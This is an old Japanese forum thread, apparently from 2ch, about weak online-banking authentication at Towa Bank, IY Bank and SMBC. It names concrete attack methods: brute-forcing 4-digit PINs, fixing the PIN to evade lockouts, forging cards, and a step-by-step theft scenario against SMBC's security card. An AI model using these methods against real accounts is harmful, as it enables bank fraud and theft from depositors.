ここの銀行のセキュリティって甘そう

http://www.bank.anser.or.jp/cgi/balance.aic?CCT0080=0516
http://google.yahoo.co.jp/bin/query?p=%c5%ec%cf%c2%b6%e4%b9%d4++%c5%b9%c8%d6%b9%e6&hc=0&hs=0

http://www.towabank.co.jp/
この銀行ね。

残高が運よければわかるわけね。
かなりやばいな。暗証番号なんて4桁だから
結構分かるもんだしね。このつくりだと
ログすらとってるかどうかアヤシイ気が・・・

>>技術的に他（サイバーテロ：ハッカー、クラッカー等の不可抗力）
に漏洩する危険性はあります。当行では当該セキュリティに関し責任
を負いかねますのでご了承ください。

だって。おいおい・・・・
使わなくても漏れるのはやばいだろ。

http://google.yahoo.co.jp/bin/query?p=%c5%ec%cf%c2%b6%e4%b9%d4%a1%a1%b8%fd%ba%c2%c8%d6%b9%e6&hc=0&hs=0

ウエブ上に口座情報って結構あるもんだね。
支店番号は調べれば何とかなりそうだし。

ってゆうかこれはやばすぎないか？

東和銀行まんせー。

　　　　　　　　　　 　　∩
　　 　 　 　 　 　 　 　 | |
　　　 　 　 ∧＿∧ 　 | |　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　 　 （　´Д｀）／ /　　＜　 先生！このスレからﾀｲｰﾎされる人はでますか？
　　　　　 ／ 　　 　 ／　　　　 ＼
　　　　 / /|　　　　/ 　　　　　　 ￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 ＿＿| | .|　　　　|
　 ＼　 ￣￣￣￣￣￣￣＼
　　||＼　　　　　　　　　　 　 ＼
　　||＼||￣￣￣￣￣￣￣||￣
　　||　 ||￣￣￣￣￣￣￣||
　　 　 .||　 　 　 　 　 　 　 ||

っていうか、この銀行のシステムが甘すぎない？
口座番号と暗証番号だけで残高教えちゃう銀行って
おかしくない？

たいほは難しいな。関係者しかアクセスできないサイト
を晒してるわけでもないし。しかし１はよくこんな
マイナーな所見つけたよね。ここリストラでもされたの？

Verisign　の証明が泣くな。

きわどい！！！！！！

ていうかさー、これってNTTデータのANSER-WEBシステム使ってるだけでしょ。
だからタコなのはNTTデータだと思うけど。
自分の入ってる銀行もこれだったよ。ちなみに、振込みの際にはFDに保存した
電子キーが必要になるです。

http://www.dokodemobank.ne.jp/web/

ここの問題は力技で1万回残高照会をすれば
暗証番号が分かってしまう所にあります。

ANSER-WEB提供の別のタイプのインターネットバンキングも使ってるけど
（電子キー不要でブラウザだけで振込みができるタイプ。その代わりPasswordが複雑）
パスワード3回間違えたらロックがかかってしまった。画面上は変化なかったからロック
されたって気が付かなかったけど。

だから、これもあんまりオイタするとチェックされちゃうかもしれないよ。気をつけてね。
まがりなりにも銀行系システムだからログもばっちり取ってるだろうし。
遊び半分で人生棒に振らないようにね。

プロ串使えばどーだろね。
漏れ串ならやばいが多段串なら・・・

匿名串を使うなんてなんか掲示板荒らしみたいではないですか？

匿名串でアクセスしたら、「ＰＲＯＸＹ規制中」って出たらヤだね。（ｗ

>>12
> パスワード3回間違えたらロックがかかってしまった

暗証番号を固定して口座番号の方を変化させるとロックされないのでは？
と思うと怖くてオンラインバンキングなんか申し込めないYO!

こんなセキュリティ甘いのはここだけ。
普通は4桁の暗証番号以外にオンラインバンキング
専用のパスワードを設定してる。
東和銀行のIT専門の人があほすぎなだけ。
だいたいSSL使わず口座番号と暗証番号を発信できる仕組みが
おかしすぎ。

>>19
そうでもないよ、ｲﾊﾟｰｲあるよ。
http://www.google.com/search?ie=utf8&oe=utf8&q=%E6%AE%8B%E9%AB%98%E7%85%A7%E4%BC%9A+ANSER

信じられんね。導入するときチェックする人いないのかな？
それにしても信金とか潰れそうな地銀が多いね。

>>18
>暗証番号を固定して口座番号の方を変化させるとロックされないのでは？

暗証番号を「1123」とか日付にしてやれば結構な確率で開くんでないの？
ページを開くとこの手のスクリプトが裏で回るページを上げたりしてはいけない。

＞と思うと怖くてオンラインバンキングなんか申し込めないYO!

つーか、
＞ 残高照会サービスは、当行キャッシュカードをお持ちの方は、どなたでも無料でご利用できます。
って書いてあるよ。申し込み不要。
聞いてないよーと言っても無駄。
＞当行では当該セキュリティに関し責任を負いかねますのでご了承ください。
ってことだ。

スーパーハカーは、地下の専用線から侵入する。
汎用機も楽勝。
日本には、両手で数えるくらいしかいないけどな。

名スレの予感。

実際に金が盗まれるかどうかはともかくとしても、
預金残高くらい見えちゃったっていいんじゃねーの？
っていう銀行やNTTDATAの発想が問題。

残高がばれるとき、当然名前もばれるよね。この仕様だと。
その人がもし大金預けてあることがわかったらその人が危険な
目にあわないとも限らない。名前がわかれば住所だって
名簿屋（電話帳でも場合によっては可能）使えばわかる。
その家に空き巣に入りキャッシュカードを盗もうと
試みる人もいるかもしれない。暗証番号はわかってるわけ
だし。そうなったらどう責任とるつもりなんだろうね。

これは２ｃｈで久しぶりのスクープになりそうな予感。

> そうなったらどう責任とるつもりなんだろうね。

そうなっても、ANSER-WEBの残高照会が盗み見られたのが原因だとは
誰も気づかないからね。ばれなきゃいいってことか？

ウィルスは大騒ぎになるから世間も問題を理解しつつあるけど、
こういう情報漏洩の問題は表面に見えてこないから、
世間が問題を認識しないんだよね。
マスコミは事件が起きてからでないと報道しないし。

>>28
スクープってーか、前々から皆わかってたんだけど、
誰も表沙汰にしてこなかったわけよ。
どうよ？そういう国民性。

サイバーテロがおこる可能性があるゾ！
島センセイにタレコミしなくちゃ！

正直、私はジャパンネットバンクに口座を持っている。
しかも500円しか入ってない。

ジャパンネットは大丈夫だろ。中小の地銀や信金のセキュリティ
にしかつけこむ隙はないよ。

>>19
ていうかー、ちゃんとSSL保護の残高照会サービスもあるじゃん。東和銀行。
「セキュリティ上、上記SSL128ビットのご利用をお勧めいたします」
って書くぐらいなら、SSL無しの方はさっさとやめちゃえばいいのにね。

私が使っている信金も似たり寄ったりだが・・・。
だが登録した電話番号からのアクセスじゃないと
つかえないということを聞いたがこれは事実なのか？

家のメイン銀行、つけこむ隙のある中小の地銀で、
しかも>>20のリストの中に入ってるよぅ。　ｳﾍ-ﾘ

>>35
それはインターネットじゃなんじゃない？それとも専用のAPがあるのか？

http://www.watch.impress.co.jp/internet/www/article/2001/0827/netbank.htm
口座開設して試しまくり！　注目の“ネット銀行”を徹底比較

http://allabout.co.jp/finance/bank/closeup/CU20010906I/index2.htm
ネット銀行 徹底比較！

こいつらもさあ、くだらねーこと比較している暇があったら、こういう
セキュリティのレベルとかを比べて見せて欲しいよな。

まあ、評価できても、公表が無理だろうけどな。

>>34
SSL使えないブラウザ使ってる人がいるからなくせないんです。
SSL非対応ページ作らないと、それはそれでツッコミを食らうです。

こういうのはどうかな。８９３さんの下っ端が口座開設する。
それで別の８９３さんが暗証番号と口座番号をネットで晒す。
最初の８９３さんが因縁をつける。

>>27
> 残高がばれるとき、当然名前もばれるよね。この仕様だと。

いや、暗証番号がばれるよ、キャッシュカードの。
アクセスできた口座は暗証番号がそれだったってことだからね。

まじやばいよ。口座閉鎖しないと。(((ﾟДﾟ)))ﾌﾟﾙﾌﾟﾙｶﾞｸｶﾞｸ
だれかそういう銀行のブラックリスト作ってくり

即刻当該銀行は当該サービスを中止せよ！だね。
でも中止しただけじゃだめ。もう暗証番号抜かれてるかもしれない。
暗証番号の変更を預金者に呼びかけるべきだね。

>>40
ミナミの帝王のビデオで見たﾈﾀだ（ｗ

perlでちょっとスクリプツ作成して2時間も回せば(運がよければ数十分)
で口座の残高わかるんだ　すごいねー。
個人口座とかは生年月日とかが多いんだろうから MM/DD で　01-12 /01/31
365ぐらいでそれでもって
DDOSとかの犯罪にならないように(藁　1秒間に1GETで365秒も
あれば簡単に見れる口座は山ほどあるんだね　笑える。

>>41
そっか。暗証番号と口座番号が判るからあとは磁気カードライタで……
(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

磁気カードライタなんてものも簡単に手に入るの？
(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>46
あるよ、例えば

http://www.conduct.co.jp/cgi-bin/disp_seihin.cgi?id=504_skt3104

これでお金取り放題
(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>47 まじで売ってるじゃないですか！
しかも「前方にも後方にもカード排出が可能」ですよ。
変な銀行よりもジャパネットにでも預けた方がよっぽど安全かもしれませんね。
(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

ﾈｯﾄ取引だと現金が伴わないから、資金移動した時点で（振込み）足が付くし、残高照会くらいしかできんだろ。
それにふつう３回連続して暗証を間違えたら口座はﾛｯｸされるから、出会いﾒｰﾙの電話みたいにグルグル回すことは出来んよ。
ブラウザ閉じてから回すと効率は落ちる だろうし、銀行のオンラインは今、地銀で３次オンラインだけど、
３次オンプラスネットバンキングのシステムでも当然口座の参照回数は暗証の正誤関係なく参照元も出てるから
異常に参照回数の多い口座は目立つ。残高照会も朝と銀行閉店後２回くらいが普通だから、１０回もあれば目立つ。

ここで騒いでるやつ高校生未満の学生だろ？アフォか。

このスレ、１が必死にスクープにしようとしてるのが笑える。
1=2=3=4=5 で自作自演したけどレスがつかないから >>8 で再登場してるな（ｗ

>>49　残高照会できるだけでも相当にやばいだろ！！
それに、暗証番号を固定して口座番号を変えていけば
かなりの暗証番号と口座の名義がわかる。
そうすれば、口座はロックされない。
もし、そういうリストを作るやつがいたら犯罪にだって
つかわれるぞ。あふぉはおまえ。レスを四面のか？

> ブラウザ閉じてから回すと効率は落ちる だろうし、

ｲﾝﾀﾈｰﾄの仕組みをわかってないNE。

４９だけど、煽られてちょっと悔しい（藁

でも暗証固定したら、口座番号は６から８桁あって、その上に３桁の店番号がつく。店は２００店程としても８桁＊２００通りあるから、
グルグル回してもどうかと思う。

こんなこと言うとしらけるかも知れんが、低確率のカウンタグルグル方式で残高照会に成功したとして、そのリストが
何の犯罪に役立つのかというのもある。低所得者や低信用度の口座は正直役に立たん。
　実家がそこそこの資産を持ってる人なら分かると思うけど、銀行員って高額預金者の口座内容の動きは隅まで把握してるよ。
だから役立ちそうな口座をこっそりあれこれするのは無理。実家が資産家の人でネット取引やった事の無い人は
アクセスしてみ。銀行員が来たとき話題振ってくるから。マネロンダも当局指導は３０００万だけど、各行独自にもっと低く設定し
てるし、営業戦略上もチェックしてる。

あと地銀と舐めてると駄目だよ。独自にオンラインしてるんじゃなく、地銀ネットとかでシステムは各行共同だモン。
でその本部では通信会社の担当者が当然記録とチェックしてる。

実は俺去年まで証券にいた。で、ネット取引って悪さできるんじゃないかと考えてたが、結論は無理だ。足跡は残るよ。
現場支店でも過去１年間の参照は対面からネットまで簡単に全部出る。クレーム客も（藁←ex.●支店で利益要求・財務省報告済み・
各店来店時要注意とか
現行オンラインって１０年くらい経ち、原始的な所があるが、これがネックになる。ヒューマンチェックが必要なの。
あと、営業戦略上、いつもリスト作ってるから、これも１種のチェックになる。預かり額、来店回数、参照回数、取引種類とか。
因みに株の注文は暗証さえあれば簡単に出せそうだが、営業マンが見てる。飯の種だもん。（藁

　利益に繋がるアクセスは無理だったよ。残高を盗み見云々はあるかと思ったが、受ける刑罰とやる意味を考えたらやってもしょうがない。
金持ち系のリストは名簿屋に行けばあるし、実際こんなもん漏れてていいのかと言う社外リストを使ったこともある。
だからここで騒いでる程のことは無い。銀行オンラインを潜れるｽｰﾊﾟｰﾊｶｰは別だが。
個人的には各行の顧客データにアクセスできる通信会社員に対する各行のチェックは甘いと思うが。
ﾃﾚﾋﾞとかﾏﾝｶﾞで色々な話があるが、経験的には金融系犯罪はわしら貧乏人は巻き込まれる心配はないです。

＞ 残高を盗み見云々はあるかと思ったが、受ける刑罰とやる意味を考えたらやってもしょうがない。

おまえｶﾅｰﾘ馬鹿。
過去レス嫁ねーのかゆわれてるだろｺﾞﾙｧ
>>41

>>54
カード偽造は出来るけど、お金を足跡残さずに引き出せない。

>>55
残高盗み見るのと違って、利益が大きい。

これは、やっぱりやばいね。

５３みたいな低濃証券ﾏﾝこが銀行やってるからこういうことになるんだな。

しかしどうすれば解決するんだ？

このスレ読んで去年の全日空のメルマガを思い出したよ。
去年８月にこんなメールが来た。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
■■■■■ ANA MILEAGE CLUB ■■■

ANAマイレージクラブ メールマガジン
(創刊号)
　 http://www.ana.co.jp
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
★・∴・☆∴・∵★・∵・☆・∴・★・∴・☆∵・∴★・∵・☆
×××　×× 様
いつもANAをご利用いただきありがとうございます。
このたびANAマイレージクラブでは総合情報メールマガジンを創刊させ
ていただきます。
マイレージ・国内旅行・海外旅行・ホテル・ショッピングと様々な情報
をご用意いたしました。どうぞご期待ください。
★・∴・☆∴・∵★・∵・☆・∴・★・∴・☆∵・∴★・∵・☆

(ﾁｮｯｷﾝｺ)

＜＜編集部から＞＞
ANA MILEAGE CLUBからのメールマガジン創刊号はいかがでしたでしょうか？
猛暑だった今年の夏もそろそろ終盤戦。朝晩の風、空の色にすこしずつ秋の
気配が感じられるようになりました。今年の夏は忙しくて、夏休みはこれから
という方にも、秋の国内旅行、海外旅行情報をたっぷりご用意いたしました。
また、マイルの貯まるANAショッピング情報もオススメです。
ANAではこれからも、会員の皆様のオトクになる情報をお届けしていきたいと
思いますので是非ご期待ください！！
──────────────────────────────────
●このメールマガジンは、8月17日時点ででEメールアドレスをご登録
いただいておりますANAマイレージクラブ会員の皆様にお届けしています。

●【パスワードについて】
ログインに必要なパスワードにつきましては、会員ご本人様の
生年月日の月日（数字４桁）で初期設定をさせていただいて
おります。
セキュリティーの関係上、お早めのご変更をお勧めいたします。
例）生年月日 1966年1月26日→パスワード＝0126

>>54 カメラに写されずに現ナマを手にするのが難しいし、
いちかばちか、カメラに姿を晒しながらＣＤから引き出しても、
一度に１００万づつしか手に入らないし。

リスクは多い割に、あまりメリットは無いよ。

俺は１００万でも盗られたくない

カメラに写っても構わないような奴ならやるんじゃないの？
本来は居ないことになってる外国人とか。

53よ。残高がわかるということは暗証番号と口座名義が分かるということに
なるのだぞ。理解してるのかい？カードの暗証番号が知られている大金持ちが
犯罪者にどう見られるか想像してみろよ。それに、暗証番号は手作業でなく
自動でトライするプログラムを作る人間だっているぞ。そうすればホントに
リストだってできる。

このスレって警察に見張られてるよ

警察からＮＴＴＤＡＴＡに要請していただいてＡＮＳＥＲＷＥＢ残高照会をやめてもらおう

ttp://www.pooh3.net/i/link/
進入できた

今ごろこんなことイッテンノ？
有名なんだけど・・・

53よ。これは現生引き出すとかの問題じゃないんだ。

ANSER-WEBにランダムな口座番号と暗証番号で一回だけアクセスする
成功したら口座番号と暗証番号をUSENETに流す

そういうロジックを仕込んだ自動感染型ウィルスが現れたらどうなる？

ウィルスいっきに拡大
　　　↓
USENETに口座と暗証番号が出回る
　　　↓
何が起きているのか分析され公表されニュースになる
　　　↓
原因を知った預金者はパニック
　　　↓
金融不安そしてIT離れ
　　　↓
日本沈没
　　　↓
どっかの国(ﾟДﾟ)ｳﾏｰ

(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
早く止めれ！

技術的に他（サイバーテロ：ハッカー、クラッカー等の不可抗力）
に漏洩する危険性はあります。当行では当該セキュリティに関し責任
を負いかねますのでご了承ください。

http://www.google.com/search?q=%88%C3%8F%D8%94%D4%8D%86%82%C8%82%C7%82%CC%8E%E6%88%F8%93%E0%97e%82%AA%8AO%95%94%82%C9%98R%89k%82%B7%82%E9

サイバーテロは、不可抗力なのか？
何とも脆弱な。。。

たしか、３回間違えると、カードの方もロックされないか？

なら、十分サイバーテロとして使えると思うぞ。

>72
ATMの方もロック掛かるの？？

なんかかなーりループしてるな。話が３回ループするとスレストでロックだぞ(w。

>>59
激しくﾜﾗﾀ・・・・つーか戦慄した。

アイワイバンクのインターネットバンキングが始まったんだけど、

http://www.iy-bank.co.jp/　トップ画面の左側のメニューから開く
ログイン画面は、SSLに対応しているリンクになっているのに、
{window.open("https://www.iy-bank.co.jp/syspr/ZN010010.html","slog","toolbar=0,location=0,directories=no,status=0,menubar=0,scrollbars=yes,resizable=0,width=800,height=600");}

http://www.iy-bank.co.jp/service/banking/internet/index.html インターネットバンキングの案内
とかの上にある「スタート（ログオン）」がSSLじゃないというのはずさんじゃないの。
{window.open("../../../syspr/ZN010010.html","slog","toolbar=0,location=0,directories=no,status=0,menubar=0,scrollbars=yes,resizable=0,width=800,height=600");}

なんで、おんなじことするのに別コードで書くかな。しかもステータスバーを非表示にさせているから
SSLのサイトかどうかわからないでやんの。

>>75
おお、ほんとだ。

http://www.iy-bank.co.jp/policy/security/index.html
アイワイバンクのインターネット／モバイルバンキングは、べリサインのグローバル・サーバIDを採用しています。すべてのデータ通信は、128bitSSL（Secure Socket Layer）暗号化通信により高度のセキュリティで保護されています。

だそうだ。すべて？？

>>76
俺も、そのページ確認しちゃいました。すべて…なのか？
ステータスバーを非表示にしていないから、サイトの製作者が
ミスに気が付くことができなかったに 1000ブリトー

> アイワイバンクは、お客様に安心してインターネット／モバイルバンキングをご利用いただくために、
> 堅牢なセキュリティシステムを採用し、情報管理に細心の注意をはらっています。

テストしてないんだね。

> モバイルバンキングはNTTドコモのデジタル暗号化処理も行っています。

デジタル暗号化処理って何だ？アナログ暗号ってあるのか？

こういうミスを防ぐために、http用とhttps用のホストを別にするのが基本だ。
間違ってもhttpで通信してしまわないように。
こりゃ、かなりわかってない業者が作ったと見た。

>>79
まぁ、三和銀行も、以前ログイン画面が非SSLだったことがある。
（http用とhttps用が同じホストだった）
いまは、三和銀行はログイン画面はSSLに統一されているけどね。
アイワイはATM地図（e-mappleを使っている）を除いて、すべての
ページがSSLでも見られるから、同一ホストを使っている可能性が
高そうだ。

つーかさ、「アイワイバンク銀行」って何だよ！
アイワイ銀行銀行か？

名前からして・・・

>>72
そう。誰でも簡単に預金封鎖ができちゃう（w
悪質業者を追い込むために、２ちゃんでもたびたびやっているよね。

>>81
それは、金融板では、激しく既出。銀行って付けないといけないらしい。
シティバンク銀行も同様だね。

さて、アイワイバンクは、こんなん出ました。IIJの下につながっているNRI-NETに接続されているみたい。
でも、サイトの運営はだれかはわからんのだけど。

>あなたが検索されたアドレス［ 133.250.244.129 ］のJPNICからの応答は以下の通りです。
>Network Information: [ネットワーク情報]
>a. [IPネットワークアドレス] 133.250.0.0
>b. [ネットワーク名] NRI-NET
>f. [組織名] 株式会社野村総合研究所
>g. [Organization] Nomura Research Institute,Ltd.

>>83
それはどうすれば解決できるの？
>>82
哀話い銀行（ｗ

>>85
インターネットの照会機能だけを使わないように銀行に届ける。

>>86
受け付けてもらえないと思われ。
「それはできないのです。」

>>86
出会い系みたいに小銭集めて喜んでいる小悪党から、
残高照会の楽しみを奪うのは酷だと思われ（w

>>86
ちゃんとした銀行なら、インターネットバンキングはしない、
とかの届出ができるよ。
デビットカード機能だけ止めることもできるし。

>>89
23が言うように、
＞ 残高照会サービスは、当行キャッシュカードをお持ちの方は、どなたでも無料でご利用できます。
だから、インターネットバンキング申し込んでなくてもロックされるのでは？

こんなのあったよ。
http://www1.mktz.com/wwwboard/messages/6414.html
Ｊデビットは、カードを偽造されて被害にあっても一切救済されないし、サービス拒否もできない。

おいおいマジか。
デビッド使用時は >>60 のような監視カメラもないよな。
インターネット残高照会で暗証番号を収集してデビッドで盗用。

ｳﾋｰまじヤバ。(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

＞インターネットの照会機能だけを使わないように銀行に届ける。

85だけど、そういうことじゃなくて、
銀行側がそういうDOS被害を避けるのにどういう技術的解決方法があるのかが聞きたい。

アイワイバンクのSSLもれ、直っているね。
いつのまにやらパスワード失効の対応機能もついているから、手直し
したんじゃなくて、仕組みがぜんぜん違っている。

>>93
ほんとだ。URLがぜんぜん違う。
ttps://ib.iy-bank.co.jp/scripts/cgiclnta.dll/CORE-Main%20Web/ND000_
に変わった。

IISで銀行か…

「ログオンパスワードを忘れた方」ボタンを押してみたら、
「ログオンパスワードを再度ご登録ください」という画面が出て、
「お客様IDとキャッシュカードの暗証番号をご入力ください」
となっているけど、
これってキャッシュカードの暗証番号でログオンできるシステムと同じ危険度ジャン？

お客様ＩＤは普通わからないから大丈夫じゃないか、と思ったけど、
キャッシュカードの裏に書いてあるんだよね。

ということは、拾ったキャッ．．．

> 「ログオンパスワードを再度ご登録ください」という画面が出て、
> 「お客様IDとキャッシュカードの暗証番号をご入力ください」

おいおい、こりゃまずいんじゃないか？
暗証番号固定でお客様IDをぶん回すと、突破できるIDと暗証番号が得られてしまうんでは？

それでパスワードを設定して不正ログオンすると、口座番号が表示されるだろう。

>>93
Cookieが発行されるようになったね。> ASPSESSIONID

プライバシーポリシーに
http://www.iy-bank.co.jp/policy/index.html
現在、当社のホームページ、およびインターネットバンキングでは、「Cookie（クッキー）」を使用しておりません。

って書いてあるけど、嘘っ八ｼﾞｬﾝ。

なまなましくなってきてなんかこわ

今更こういうの知らなかったフリはできないしなぁ

age

三井住友銀行もキャッシュカードの暗証番号4桁でログインできますね。
残高はもちろん、住所氏名電話番号も全て分かってしまいます。

これからは銀行の格付けの条件に「ネットサービスの有無」が加わるのかね。
もちろんタコなシステム使っている銀行は「危険」扱い。

／／／／／／／／／／／／／／／／／／／

■ 全国のハッカー＆荒らし集合！！ ■




http://kgy999.ath.cx/cgi-bin/1/2.cgi
史上最悪のUG掲示板

／／／／／／／／／／／／／／／／／／／／／

;;;
;;;

三井住友銀行は問題ない。
パスワードはたぶん英数字を組み合わせたものになってる。

やっぱり、これやばい。

警察とか警告ださないのか？
せめて、４桁の暗証番号とは、別の番号に置き換わって欲しいＹＯ。

K札も2ch見てるんでしょ。
派手な警告とか出さず密かに完璧な対策を終了しててほしー。

銀行からお知らせ
「当行のシステムにセキュリティホールが見つかりましたので、
１週間後の12/26にメンテナンスの為４時間ほどサービスを停止いたします。」

セキュリティホールってそんないいかげんな・・・
単なるホームページにセキュリティホールも何もないでしょ。

>>108
進展があったのか？どこの銀行？

よく読め。
>>108はネタだろう？
セキュリティホールがあったって告知するアホウはおるまい。

なんでこんな展開になっているんだ？

>といざらす・東和銀行のセキュリティ えむびーまん 12/20(木) 10:54:03
>
>Ｉアプリの旅客機でＧＯ　すべて、まとめて、マスコミ５０社にニュース配信します。
>でも、５社くらいのマスコミには、すでに口頭で伝えてあります。
>ニチコン連の山本情報（微笑

http://kaba.2ch.net/test/read.cgi/net/1008506988/472

>>105
https://direct.smbc.co.jp/aib/aibgsjsw5001.jsp
オンラインからお申し込み（ＡＴＭからのお申し込みも含みます）いただいた際、第一暗証をご指定いただいていないお客さまは、キャッシュカードの暗証番号をご入力ください。（ログイン後に変更することができます。）

と書いてあるYO。

ではアラスカ。

金融監督庁にチクっても改善されないのかな？？

>116
かなり大人数の人が何度もチクらないと気づいてくれなsage

じゃあ、全国銀行協会はどう？
ttp://www.zenginkyo.or.jp/index.html

「苦情の受付と解決促進に関する規則」なんてものも
あるみたいだし。
ttp://www.zenginkyo.or.jp/news/kujoukisoku.html

>>32
思いっきりワラタ！
ごめん、亀レスで。

三井住友銀行だけど、One'sダイレクトの新規申込がオンラインでできるようになってて、
本人確認を口座番号とキャッシュカードの暗証番号でやるようになってる。
(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
http://www.smbc.co.jp/kojin/sonota/direct/ones_new.html

ふが

>>116
可能性じゃ何もやらんのよ。脳睡省と同じ。
実害が出てからでないと。
だからっておまいら絶対やるなよ。

（1/3）

三井住友銀行の「One's DIRECT」サービスは、利用者が便利さ・振込手数料・
金利の３点で恩恵を受けるという長所を持つ。しかし私は、このシステムには
数々の重要な問題点があるように思う（そのうちのいくつかについては本スレッ
ドでもすでに指摘されている）。以下でこのシステムの問題点を考察したい。

まず、キャッシュカードの暗証番号４桁だけで残高照会ができてしまうという問
題点がある。これは本スレッドに既出の通りである。（One's DIRECTの場合、
インターネット経由のアクセスに関してはこの４桁とは別に英数字８桁の暗証番
号を設定できるが、この設定も電話経由／i-mode経由のアクセスに対しては無
力である。）

しかし、One's DIRECTにはさらに重要な問題がある。それは「暗証カード」と
いう認証方式である。オフィシャルのパンフレットである「ご利用の手引き」
は、このシステムを「３つの暗証番号を確認させていただく」「高度な本人認証
システム」と評している。しかし私は、必ずしもそのような評価はできないので
はないかと考える。

まず、簡単にこのシステムを見ておこう。この「暗証カード」方式の場合、認証
のプロセスは、

第１暗証（キャッシュカードの暗証番号４桁）→残高照会など可
　↓
第２暗証（暗証カード記載の乱数表内の数字の、縦横で枠指定）→任意の口座へ
振込など可
　↓
第３暗証（暗証カード記載の乱数表内の数字の、郵送時指定の枠入力）

の３段階になっている。そして暗証カードの裏面には、縦（ア、イ、ウ、エ）×
横（１、２、３、４）＝４×４の枠内にそれぞれ２桁の数字がランダムに記され
ている。第２暗証とは、アクセス時にこの縦・横を銀行側が指定するので（たと
えば「イ−２」）、その枠に書かれた数字２桁（たとえば「９８」）を入力する
というもの。第３暗証とは、暗証カード郵送時にカード本体とは別に、特定の枠
が縦・横で１つ指定されているので（第２暗証と同様に、たとえば「イ−２」の
ような形で）、それを入力するというものである。

このことから明らかなように、暗証カード本体を入手してしまえば、第２暗証は
カードを見ればわかるし、第３暗証も４×４＝１６回試みればわかってしまうと
いうことになる（平均すれば８回程度だろう）。

暗証カード本体の入手が必要ということで、ここまで見ると普通のキャッシュ
カードの場合の危険度とかわらないと思うかもしれない。しかし、実はそうでは
ない。というのもこのシステムの場合、暗証カード本体に記載されている乱数表
と契約者番号さえ入手してしまえば、カード本体は特に必要ない。したがって利
用者が「盗難」の被害を受けたとしても、そのことに気づくのがかなり遅れざる
をえないという、従来にはなかった問題が発生することになるのである。この点
をふまえた上で、本スレッドのこれまでの情報も参照しつつ、モバイルバンク時
代の泥棒の手口を以下で考察してみよう。

（つづく）

（2/3）

泥棒の行動１：ターゲットの第１暗証（キャッシュカードの暗証番号）を入手す
る。
（既出。インターネット経由で入手できる。最大で１万回、生年月日に限定すれ
ば365〜6回のトライで入手可能）

泥棒の行動２：ターゲットの暗証カードに近づく。
（ターゲットがまったく面識のない相手の場合には、暗証カードを部屋に保管し
ていれば部屋に進入する必要があるが、財布などに入れて携帯している場合には
スリなどの手段も考えられる。あるいは知人宅に招かれた場合で、その相手が席
を外した場合など、ごくわずかな時間でも十分に可能。なお、ここでは検討しな
いが、インターネットに詳しくない人に対しては、偽装メール・偽装ホームペー
ジなどの手口も可能かもしれない）

泥棒の行動３：１で入手した第１暗証と、暗証カードに記載された契約書番号と
乱数表を用いて、ターゲットの口座にアクセス→第２暗証をクリア。
（契約書番号と乱数表は紙に写し取ってもいい。４×４の表を書き写すのに１分
もかからないだろう。あるいは携帯電話を持参して、その場で電話／i-modeと
いうのもお手軽。いずれにしても、その後暗証カードを元通りに返却しておけ
ば、ターゲットは「盗難」にあったことすら気づかない）。

泥棒の行動４：ターゲットの口座から任意の口座へ振込。
（第２暗証までクリアできれば、電話／i-modeからこの操作を行うことができ
る。平成14年2月3日までにこの行動を行えば、「振込手数料21円キャンペー
ン」の恩恵も受けることができる）

泥棒の行動５：振込先の口座から現金を引き出す。
（ここで監視カメラに写る危険は確かにある。しかし、従来のキャッシュカード
の場合と異なり盗難の痕跡が残らないことから、ターゲット側は金融機関への通
報などの手段をそもそも用いることができない。泥棒のこの行動自体を事前に押
さえることは不可能）

泥棒の行動６：金がなくなるまで豪遊する。
（５で泥棒を特定できたとしても、泥棒がこの行動をとってしまえばターゲット
側は泣き寝入りするしかない。ログや監視カメラの記録から泥棒を特定できたと
しても、あくまでその泥棒を刑事訴追できるだけである。泥棒がそもそも盗んだ
金を全て使ってしまった場合には、ターゲット側にその金を取り戻す手段はない
（民法で言う、「善意の第三者」にかかわる論点である））。

（つづく）

（3/3）

以上の考察から、この「暗証カード」方式がそれほど「高度な本人認証システ
ム」ではなく、むしろ従来のキャッシュカード方式に比べて危険な面も多いこと
が明らかになったと思う。従来のキャッシュカードの場合は、本人が自分の
キャッシュカードを所持していれば、そのカードを他人が同時に使用していると
いうことは物理的にありえなかった。しかし「暗証カード」方式においては、た
とえ暗証カードを本人が所持していたとしても、そのことは本人の口座が他の
人々によって使われていないということを、決して保証はしないのである。
（「ご利用の手引き」には「万一、暗証カードが紛失や盗難にあった場合には、
ただちに三井住友銀行までご連絡ください」という注意書きがあるが、すでに明
らかなように暗証カードを物理的に盗む必要は全くないのだから、この注意書き
はそもそも全く意味がない。）　したがって利用者に対しては、「盗難されてい
るかもしれない」という不安が常につきまとうことになるのである。

利用者側の防御手段として、暗証カードの「乱数表」（すでに明らかな通り、あ
まり「乱数」として機能していないが）を定期的に再発行するということも考え
られる。しかし現状では、カード自体が郵送されてくるまでのタイムラグが存在
するため、即座の対応は期待できない。

では、なぜそもそもOne's DIRECTでこのような「暗証カード」方式が採用され
たのか。通常の８桁パスワード方式では何か問題があるのだろうか？　電話機や
i-modeから利用できるようにするためだろうか。でもそれならば、８桁（以
上）の数字を入力する方式にしてもいいはずだ。これならそもそも「暗証カー
ド」などは必要ない。

他にもさまざまな憶測が可能だが、いずれにせよ、以上のような「暗証カード」
方式の問題点を解決するような新しい認証方式を開発することが急務であると考
える。

なお、本考察は、三井住友銀行の名誉を毀損する目的でなされたものではない。
同様の問題点は数多く存在するのであり、本考察はその一例にすぎない。この事
例考察により、セキュリティに関する一般の意識が高まり、より優れた認証方式
が考案されることを希望する。

結論：「暗証カード」方式にはセキュリティ上の問題がある。この問題が解決さ
れるまでは、「One's DIRECT」システムの利用を控えるのが賢明である。

>>123-125
ﾏｼﾞﾚｽ ｶｺｲｲ（・∀・）

> この問題が解決されるまでは「One's DIRECT」システムの利用を控えるのが賢明である。

